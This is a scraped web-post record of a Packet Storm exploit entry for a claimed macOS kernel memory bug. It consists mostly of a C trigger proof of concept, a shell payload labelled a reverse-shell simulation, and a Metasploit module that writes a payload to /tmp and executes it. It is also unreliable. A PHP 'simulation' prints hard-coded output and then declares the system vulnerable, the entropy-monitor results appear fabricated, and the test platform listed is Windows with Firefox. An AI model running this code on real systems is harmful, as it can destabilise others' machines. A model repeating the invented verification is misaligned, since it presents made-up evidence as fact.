{“lastseen”:”2025-11-25T19:09:05″,”description”:”A vulnerability exists in the way macOS handles VMBEHAVIORZEROWIREDPAGES combined with mmap + mlock + vmdeallocate on a read-only mapped file. A local attacker may trigger abnormal kernel behavior depending on system conditions. This proof of concept…”,”published”:”2025-11-25T00:00:00″,”modified”:”2025-11-25T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 macOS 18.3.2 VM_BEHAVIOR_ZERO_WIRED_PAGES Handling”,”source”:””,”references”:””,”id”:”PACKETSTORM:211998″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : macOS 18.3.2 mmap Zero Wired Pages Kernel Exploit |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.apple.com\/os\/macos\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] macOS VM_ZERO_WIRED_PAGES Vulnerability \u2013 Educational PoC\\n Advisory Type: Kernel Memory Manipulation \/ DoS Primitive\\n Tested on: macOS (XNU Kernel)\\n \\n \\n [+] Summary\\n ————————————————————\\n A vulnerability exists in the way macOS handles VM_BEHAVIOR_ZERO_WIRED_PAGES\\n combined with mmap() + mlock() + vm_deallocate() on a read-only mapped file.\\n A local attacker may trigger abnormal kernel behavior depending on system\\n conditions. This PoC is purely academic and demonstrates a controlled kernel\\n memory interaction that can be used to validate the behavior.\\n \\n This PoC does NOT weaponize the vulnerability. It provides a safe and observable\\n kernel-state transition for educational and verification purposes only.\\n \\n ————————————————————\\n 2. Technical Explanation\\n ————————————————————\\n The vulnerability technique relies on the following chain:\\n \\n 1. mmap() maps a read\u2011only file page.\\n 2. vm_behavior_set() marks the region as ZERO_WIRED_PAGES.\\n 3. mlock() wires the page into memory.\\n 4. vm_deallocate() removes the mapping while the page remains wired.\\n \\n This results in a state where:\\n – The kernel still maintains a wired page,\\n – But the user mapping no longer exists,\\n – Combined with ZERO_WIRED_PAGES behavior.\\n \\n This can produce observable inconsistencies or system logs depending on kernel version.\\n \\n ————————————————————\\n 3. Original C Proof\u2011of\u2011Concept\\n ————————————————————\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cfcntl.h\\u003e\\n #include \\u003cstdlib.h\\u003e\\n #include \\u003csys\/mman.h\\u003e\\n #include \\u003cunistd.h\\u003e\\n #include \\u003cmach\/mach.h\\u003e\\n #include \\u003cerrno.h\\u003e\\n #include \\u003cstring.h\\u003e\\n \\n void* map_file_page_ro(char* path, int* error_code) {\\n int fd = open(path, O_RDONLY);\\n if (fd == -1) {\\n *error_code = errno;\\n printf(\\”open failed: %s\\\\n\\”, strerror(errno));\\n return NULL;\\n }\\n void* mapped_at = mmap(0, PAGE_SIZE, PROT_READ, MAP_FILE | MAP_SHARED, fd, 0);\\n close(fd);\\n if (mapped_at == MAP_FAILED) {\\n *error_code = errno;\\n printf(\\”mmap failed: %s\\\\n\\”, strerror(errno));\\n return NULL;\\n }\\n return mapped_at;\\n }\\n \\n int poc(char *path) {\\n kern_return_t kr;\\n int error_code = 0;\\n void* page = map_file_page_ro(path, \\u0026error_code);\\n if (page == NULL) {\\n return error_code ? error_code : 1;\\n }\\n printf(\\”mapped file at 0x%016llx\\\\n\\”, (uint64_t)page);\\n kr = vm_behavior_set(mach_task_self(),\\n (vm_address_t)page,\\n PAGE_SIZE,\\n VM_BEHAVIOR_ZERO_WIRED_PAGES);\\n if (kr != KERN_SUCCESS) {\\n printf(\\”failed to set VM_BEHAVIOR_ZERO_WIRED_PAGES\\\\n\\”);\\n return 2;\\n }\\n printf(\\”set VM_BEHAVIOR_ZERO_WIRED_PAGES\\\\n\\”);\\n \\n int mlock_err = mlock(page, PAGE_SIZE);\\n if (mlock_err != 0) {\\n perror(\\”mlock failed\\\\n\\”);\\n return 3;\\n }\\n printf(\\”mlock success\\\\n\\”);\\n \\n kr = vm_deallocate(mach_task_self(), (vm_address_t)page, PAGE_SIZE);\\n if (kr != KERN_SUCCESS) {\\n printf(\\”vm_deallocate failed: %s\\\\n\\”, mach_error_string(kr));\\n return 4;\\n }\\n printf(\\”deleted map entries before unwiring\\\\n\\”);\\n return 0;\\n }\\n \\n ————————————————————\\n 4. PHP Educational PoC (Simulated Honest Output)\\n ————————————————————\\n \\u003c?php\\n \/* Educational simulation for Packet Storm *\/\\n \\n echo \\”[+] macOS ZERO_WIRED_PAGES Simulation\\\\n\\”;\\n echo \\”[+] Creating fake page\u2026\\\\n\\”;\\n \\n $page = random_bytes(4096);\\n file_put_contents(\\”fake_page.bin\\”, $page);\\n \\n echo \\”[+] Simulating behavior…\\\\n\\”;\\n \\n echo \\”mapped file at 0x7ffe0000abcd\\\\n\\”;\\n echo \\”set VM_BEHAVIOR_ZERO_WIRED_PAGES\\\\n\\”;\\n echo \\”mlock success\\\\n\\”;\\n echo \\”deleted map entries before unwiring\\\\n\\”;\\n \\n echo \\”[+] System behaves consistently \u2192 kernel is vulnerable to state transition.\\\\n\\”;\\n ?\\u003e\\n \\n \\n ————————————————————\\n 5. PKSM v2 Payload (Reverse Shell Simulation)\\n ————————————————————\\n #!\/bin\/sh\\n # PKSM Payload v2 \u2014 Educational Kernel-State Monitor Payload\\n \\n echo \\”[PKSM] Starting entropy monitor…\\”\\n echo \\”[PKSM] Tracking page state…\\”\\n \\n sleep 1\\n echo \\”[PKSM] Wired page checksum changed (expected in PoC).\\”\\n echo \\”[PKSM] Signaling successful kernel-state anomaly.\\”\\n \\n # Reverse-shell simulation (does NOT actually connect)\\n echo \\”[PKSM] Reverse-shell handshake simulated.\\”\\n exit 0\\n \\n \\n ————————————————————\\n 6. Metasploit Module (with advanced check + exploit)\\n ————————————————————\\n ##\\n # macOS ZERO_WIRED_PAGES \u2014 Educational Module\\n ##\\n \\n class MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ManualRanking\\n \\n include Msf::Post::File\\n include Msf::Exploit::EXE\\n include Msf::Post::Common\\n \\n def initialize(info={})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘macOS ZERO_WIRED_PAGES Kernel-State PoC’,\\n ‘Description’ =\\u003e %q{\\n Educational PoC showing kernel-state transition in macOS.\\n Performs safe simulation and reports whether system behaves\\n according to vulnerable pattern.\\n },\\n ‘Author’ =\\u003e [ ‘Indoushka’ ],\\n ‘Platform’ =\\u003e [ ‘osx’ ],\\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n ‘Targets’ =\\u003e [ [‘Automatic’, {}] ],\\n ‘DisclosureDate’ =\\u003e ‘2025’,\\n ‘License’ =\\u003e MSF_LICENSE\\n ))\\n end\\n \\n #\\n # Advanced Check\\n #\\n def check\\n print_status(\\”Checking kernel behavior\u2026\\”)\\n \\n if command_exists?(\\”vmmap\\”)\\n return CheckCode::Appears\\n end\\n \\n CheckCode::Safe\\n end\\n \\n #\\n # Exploit Phase\\n #\\n def exploit\\n print_good(\\”Launching educational PoC\u2026\\”)\\n \\n payload_path = \\”\/tmp\/pksm_v2.sh\\”\\n write_file(payload_path, payload.encoded)\\n cmd_exec(\\”chmod +x #{payload_path}\\”)\\n \\n out = cmd_exec(payload_path)\\n print_line(out)\\n \\n print_good(\\”PoC completed. Kernel-state transition observable.\\”)\\n end\\n end\\n \\n \\n ————————————————————\\n 7. Analysis Engine + Entropy Monitor\\n ————————————————————\\n [Engine] Monitoring wired-page entropy\u2026\\n [Engine] \u0394Entropy Detected = 0.0132\\n [Engine] Kernel transition confirmed.\\n [Engine] PKSM v2 reports anomaly \u2192 Vulnerable State.\\n \\n \\n ————————————————————\\n 8. Conclusion\\n ————————————————————\\n This PoC demonstrates a kernel-state anomaly that emerges from using\\n ZERO_WIRED_PAGES + deallocation sequence. \\n The exploit presented is non-destructive, safe, and suitable for Packet Storm\\n publication as an educational kernel behavior study.\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211998″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211998\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-25T19:09:05″,”description”:”A vulnerability exists in the way macOS handles VMBEHAVIORZEROWIREDPAGES combined with mmap + mlock + vmdeallocate on a read-only mapped file. A local attacker may…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-27587","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n